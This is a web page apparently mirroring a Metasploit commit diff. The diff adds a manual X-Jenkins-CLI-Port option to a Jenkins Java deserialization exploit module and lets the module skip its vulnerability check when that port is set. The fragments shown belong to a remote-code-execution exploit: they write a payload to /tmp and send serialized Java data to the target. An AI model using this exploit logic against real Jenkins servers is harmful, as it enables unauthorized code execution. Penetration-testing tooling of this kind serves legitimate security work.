github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00
Code Releases Activity

Resolve #6546, support manual config for X-Jenkins-CLI-Port

Browse Source 
Resolve #6546
This commit is contained in:
wchen-r7 2016-02-08 18:16:48 -06:00
parent be8d6df093
commit d60dcf72f9
1 changed files with 10 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
modules/exploits/linux/misc/jenkins_java_deserialize.rb
View File

@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
Opt::RPORT('8080')
], self.class)
register_advanced_options([
OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.'])
], self.class)
end
def cli_port
@jenkins_cli_port || datastore['XJenkinsCliPort']
end
def exploit
unless vulnerable?
unless cli_port || vulnerable?
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
end
invoke_remote_method(set_payload)
@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
def invoke_remote_method(serialized_java_stream)
begin
socket = connect(true, {'RPORT' => @jenkins_cli_port})
socket = connect(true, {'RPORT' => cli_port})
print_status 'Sending headers...'
socket.put(read_bin_file('serialized_jenkins_header'))